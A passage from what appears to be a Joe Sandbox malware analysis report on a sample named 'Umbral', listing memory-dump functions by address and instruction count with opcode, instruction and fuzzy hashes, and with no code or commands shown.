                                        • Instruction ID: 6ac2539234fc47dab1cfe379681feb5c8958af840f4a62d215ea6b7b72c7771b
                                        • Opcode Fuzzy Hash: 77619b89dca25b1f64211a18318519eeea113227f436b29b4320dd66188c35bb
                                        • Instruction Fuzzy Hash: E0E0EC71A0CA044F9748EA2C948D96B7FE5DBEC365F144B3FB44DD3271DA7086448789
                                        Function 00007FF848E7E62A Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                                        • Instruction ID: bf9aceeb4fee0d1015c0c3df67300e839302a58e25ca8615cf6eb20ffee2723a
                                        • Opcode Fuzzy Hash: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                                        • Instruction Fuzzy Hash: 13D09E33E5C9174DF698728874032FCF380FB85AB0F50517BD25FC14829E2AB41611CA
                                        Function 00007FF848EAB740 Relevance: .0, Instructions: 22COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 88454f291d54ae6750f23dfcef6e31ad0c98673bb4b3802a0fdda105953ffe4c
                                        • Instruction ID: 6722ab6cfd2ac6acd752ada1bf3644ccfc2cadba3ecba59277974cda7b4b7304
                                        • Opcode Fuzzy Hash: 88454f291d54ae6750f23dfcef6e31ad0c98673bb4b3802a0fdda105953ffe4c
                                        • Instruction Fuzzy Hash: 02D01221D28E1D4FDAB8BA7890453A671E0FB58314F400AA9D41AC3589DFB8A98583C5
                                        Function 00007FF848E8538A Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b1b70077d1032325b7c12ba2a83ab13dc98a9b9b52d8316ab73ad8a2d13d76f0
                                        • Instruction ID: 2cf440e83d6b085640613632febe64e159ce884f003b97284f6935d9d927713c
                                        • Opcode Fuzzy Hash: b1b70077d1032325b7c12ba2a83ab13dc98a9b9b52d8316ab73ad8a2d13d76f0
                                        • Instruction Fuzzy Hash: 1EE0C262C0EA8A0EEB51AA74A4696BCAFD1AB61B60F5401FAC444471A7DE38154B8605
                                        Function 00007FF848E9064A Relevance: .0, Instructions: 18COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f80dcd417c1806b088a29832bec5425820fe8779aac7d4189cae18796a0c0536
                                        • Instruction ID: fa0c4c93b2a78f9bdf03f265f7f0174b794b10fc4a4b9248a8506a4afc707ac0
                                        • Opcode Fuzzy Hash: f80dcd417c1806b088a29832bec5425820fe8779aac7d4189cae18796a0c0536
                                        • Instruction Fuzzy Hash: 81D02B93C0EB864FD693E23450AD7B42BC0AFA3248F4401E6C8041B197D528140D8241
                                        Function 00007FF848E867CA Relevance: .0, Instructions: 18COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5d84e707b01d11f6760bb39d357135f3e1b420fefd58b69c49fab9346994f2a5
                                        • Instruction ID: 0d9a93f4e5f60a1e995ccf645dcbde93596c433d4c0ba3bdb897867fb2a5b959
                                        • Opcode Fuzzy Hash: 5d84e707b01d11f6760bb39d357135f3e1b420fefd58b69c49fab9346994f2a5
                                        • Instruction Fuzzy Hash: E4D02B83C0DBC70EE741A73460597A86FC0AF61750F8401F5C4544B1ABED2C414E8645
                                        Function 00007FF848E708FE Relevance: .0, Instructions: 17COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b0bbfec86485a7a08747c16496336e8a351579d6ad56dd4ccfbc5a863e24edc
                                        • Instruction ID: 4b10f029e8f3cdd288524988d120dd1351aecfd19956b782810d35b1cb82556a
                                        • Opcode Fuzzy Hash: 3b0bbfec86485a7a08747c16496336e8a351579d6ad56dd4ccfbc5a863e24edc
                                        • Instruction Fuzzy Hash: 44D0127245C7094BC205AB54E4104DAB7A0FB883A4F400B3AE09E911A5DF6892858681
                                        Function 00007FF848E70C57 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7b66d635945d40963614229eec94c4c8ce3cf48aaf65e5091f1b06d60a58a9ba
                                        • Instruction ID: be19b9a179aa089c6120331898805252b88719506d57cf242b9babc9a247e7f9
                                        • Opcode Fuzzy Hash: 7b66d635945d40963614229eec94c4c8ce3cf48aaf65e5091f1b06d60a58a9ba
                                        • Instruction Fuzzy Hash: 61D05E3142CB094BD345EF14E4508DAB7A0FF84770F800B2EF06E861E5DF7492868686
                                        Function 00007FF848E8BEA8 Relevance: .0, Instructions: 16COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 85d69ad4163207f4275177bb1dff1313a3477025f6fcbcdefeac50f32e1f25ab
                                        • Instruction ID: 1add8815f916e54a093491afd81fce2aa4e493946989a7ba03325b1673878939
                                        • Opcode Fuzzy Hash: 85d69ad4163207f4275177bb1dff1313a3477025f6fcbcdefeac50f32e1f25ab
                                        • Instruction Fuzzy Hash: 7DD0A722C2D9054DD94A72754C920202580BA5931CFE50294D06C822D1E95C5442C206
                                        Function 00007FF848E8997A Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1534a440531b46fb8637d4e7e9ab46e1c21fa1dc1bf7fe904b34824917602d9c
                                        • Instruction ID: a17aeca4be262210f5a82fe0bde18e18adc98f7c89cad1fa7f5bd4ab404f45d0
                                        • Opcode Fuzzy Hash: 1534a440531b46fb8637d4e7e9ab46e1c21fa1dc1bf7fe904b34824917602d9c
                                        • Instruction Fuzzy Hash: 6DD0C971C48A0A4EDBA0AA54A4419E977A0FBA4750F90017AD02563256DF38564B8A44
                                        Function 00007FF848E86A94 Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c3cc1f1a8117be45d61f37d10180197b30bc900aed4aee4a90ee1feda7138059
                                        • Instruction ID: 7c7392b7efc2ae44503de8f444738fee204d13ba236faa6cd1a8d704c48b585f
                                        • Opcode Fuzzy Hash: c3cc1f1a8117be45d61f37d10180197b30bc900aed4aee4a90ee1feda7138059
                                        • Instruction Fuzzy Hash: 7BC02B01F5C9190EE150310C3C010BC6382FBC4170F9007B3D00FC328DCC2D988201C6
                                        Function 00007FF848E86A84 Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d1b5b74f50968a8750edb2a775f88039665b864a89b449f50cde9ff13edd93df
                                        • Instruction ID: d68690d2b4214094c1db541633df888466a28a6d085a0f0931815bc3f04ac938
                                        • Opcode Fuzzy Hash: d1b5b74f50968a8750edb2a775f88039665b864a89b449f50cde9ff13edd93df
                                        • Instruction Fuzzy Hash: 16C08C01B6C8190AE050210C38010BC5282BB841A0B9006B3D00AC2289C82D984201C6
                                        Function 00007FF848E86A74 Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e86ee1cd28e4c9828bffb6a7ccb0542c0300719732a09a7e131c163d0388a9e0
                                        • Instruction ID: 9963ce3c6d2f1565501762dfbdf5db91ca88653ee6fd4a0a6c22c230f8723fb9
                                        • Opcode Fuzzy Hash: e86ee1cd28e4c9828bffb6a7ccb0542c0300719732a09a7e131c163d0388a9e0
                                        • Instruction Fuzzy Hash: EEC04C01B1C9194AE550655C78411BD5282A784560B9557B7D50AC22D9C96D989201C6
                                        Function 00007FF848E7F7E7 Relevance: .0, Instructions: 14COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b36c05e086d3606b957039c638f2d7ea02117c38f757803fc469a2e8f4ef728e
                                        • Instruction ID: feae7a5334e81aa06ff1456f03c16bd2c29a3824ac1fcf21a1c2568cf7c143e0
                                        • Opcode Fuzzy Hash: b36c05e086d3606b957039c638f2d7ea02117c38f757803fc469a2e8f4ef728e
                                        • Instruction Fuzzy Hash: F7C01262D1C8465FE6445A5874810E97391F761651F544629E44A43189EF3855478A44
                                        Function 00007FF848E86B50 Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3813973fc91a8a80e693ec4bf0588aec602fe175248f12197ad5c9d7b7ff211a
                                        • Instruction ID: 05a4e6c663a912566afc3279898e506e8d74e83e9b07e95c0af85cac0f60d4f8
                                        • Opcode Fuzzy Hash: 3813973fc91a8a80e693ec4bf0588aec602fe175248f12197ad5c9d7b7ff211a
                                        • Instruction Fuzzy Hash: 41C02220A08C2C0E02A8B22E0808A3A00C2CBCC220B0802BBA00CC3288CC200C0203C0
                                        Function 00007FF848E83CCA Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b0dcd419502779a4fa5ce945bba19a2cc0883589b1c648c4dcade9b64bbc0f2
                                        • Instruction ID: 0bec73abf13f878feb4579ca4fa46fb64c91b5a11a417cda9c8b99abb685de6a
                                        • Opcode Fuzzy Hash: 1b0dcd419502779a4fa5ce945bba19a2cc0883589b1c648c4dcade9b64bbc0f2
                                        • Instruction Fuzzy Hash: C6C08013D5C5071DE694671CF0455FD27C0F7907B0FD80131D405D224ADD6C51874546
                                        Function 00007FF848E73F43 Relevance: .0, Instructions: 13COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 795ea67e8b3ca868f8222e4b850c6598d3beea81e87ce9e1b10892f7c41b00e2
                                        • Instruction ID: fae37e6d83c50e725f94bec42412d1c6992129b31b07125391384f2291c9af77
                                        • Opcode Fuzzy Hash: 795ea67e8b3ca868f8222e4b850c6598d3beea81e87ce9e1b10892f7c41b00e2
                                        • Instruction Fuzzy Hash: 63C0123242C9855BD341B700E4418EB7351FFD0700F801B39F05A4109AED69A6448682
                                        Function 00007FF848E92530 Relevance: .0, Instructions: 11COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c8d1beb1fb2f6b0479a927a22aa67f79e5f956e9c12a25f5e507eae62de257ab
                                        • Instruction ID: 714b26bca1542c07f81d409c7b8391b6977be5ab152f441a9a0bc3818eb59f9d
                                        • Opcode Fuzzy Hash: c8d1beb1fb2f6b0479a927a22aa67f79e5f956e9c12a25f5e507eae62de257ab
                                        • Instruction Fuzzy Hash: 17C08C3082E9098ECA14B7294841054B190FF08284FC401B8E00CC2249E7AC9090534D
                                        Function 00007FF848E809E9 Relevance: .0, Instructions: 9COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e55a75ff9e19932f76e50e3618ba7705c9440b530d8c687fcbbdf5c1af5ca719
                                        • Instruction ID: 57a58751d1e558150b77014aa1d5b04b774e291868cf5167702df82b6ea96e90
                                        • Opcode Fuzzy Hash: e55a75ff9e19932f76e50e3618ba7705c9440b530d8c687fcbbdf5c1af5ca719
                                        • Instruction Fuzzy Hash: 87B01233A4D0094C9A10208474010FDF310F780176F900133D70D8200086A2142505D0
                                        Function 00007FF848E88205 Relevance: .0, Instructions: 9COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 15faabeb865673dcff9243e3daa9b92b9217bc6b420e55384cc35e80e64abbe3
                                        • Instruction ID: 2a0653a4fbfbf3793b8f6b516e45d3bdbd62fd68e16690eb27861c9b4ecd5d04
                                        • Opcode Fuzzy Hash: 15faabeb865673dcff9243e3daa9b92b9217bc6b420e55384cc35e80e64abbe3
                                        • Instruction Fuzzy Hash: 59B01233A8A0194DDA10508474010FDF320F7801B6F500133CB0DC20004713102651C0
                                        Function 00007FF848E83F85 Relevance: .0, Instructions: 9COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0eae9b0286c16d23a9ed2c9c20d00e4a34ec48259d0caf6326cfd71676d81c9b
                                        • Instruction ID: 7040a7e6e019022ed6a7a52b5e3b6827d4dafe824493d33f522f5b1ebf3b4dfa
                                        • Opcode Fuzzy Hash: 0eae9b0286c16d23a9ed2c9c20d00e4a34ec48259d0caf6326cfd71676d81c9b
                                        • Instruction Fuzzy Hash: 80B01237A49409489A2020C474010FDF314E78017AF500133C30D820008612102541C0
                                        Function 00007FF848E7F98A Relevance: .0, Instructions: 6COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b73656ccb9c54c143f8768e1a37ddcdd8abbef968b3860c30b144a21026c9be7
                                        • Instruction ID: 283df5c111b268c50c06330a3ea02dba0955db8f0318f8ebf3041b754d2fb447
                                        • Opcode Fuzzy Hash: b73656ccb9c54c143f8768e1a37ddcdd8abbef968b3860c30b144a21026c9be7
                                        • Instruction Fuzzy Hash: 4CA0223288808C8BCF2088003C020FC3300FB00200F000022EC0E02000BB32A2380080
                                        Function 00007FF848E815E8 Relevance: .0, Instructions: 1COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ab954bb0bd92b9b8a5e1034cf0854c2b9a800f4e61f6e08773f72b7c0c55a71b
                                        • Instruction ID: d0bd5e3c221a774d420060c697ca70a1756a3f141e38dc10adbbed3f2f6eeb6c
                                        • Opcode Fuzzy Hash: ab954bb0bd92b9b8a5e1034cf0854c2b9a800f4e61f6e08773f72b7c0c55a71b
                                        • Instruction Fuzzy Hash:
                                        Function 00007FF848E815D8 Relevance: .0, Instructions: 1COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 69037323fc0170473b5db771aa43c0fc2a997add340dc4d5fa1c785acc96745e
                                        • Instruction ID: ae3ec369919cf444501e57caef6660bdae0ec521959d44ee71b1b055d2fd4d56
                                        • Opcode Fuzzy Hash: 69037323fc0170473b5db771aa43c0fc2a997add340dc4d5fa1c785acc96745e
                                        • Instruction Fuzzy Hash:
                                        Function 00007FF848E815B0 Relevance: .0, Instructions: 1COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 503cef32d39dd246bdcebc15c23829a7424f09cb9f96541707826c907b24f770
                                        • Instruction ID: d1b05f6eeb43f747f4395bf151dedb90c1d5b068ce2b1d0c2d3d823951485202
                                        • Opcode Fuzzy Hash: 503cef32d39dd246bdcebc15c23829a7424f09cb9f96541707826c907b24f770
                                        • Instruction Fuzzy Hash: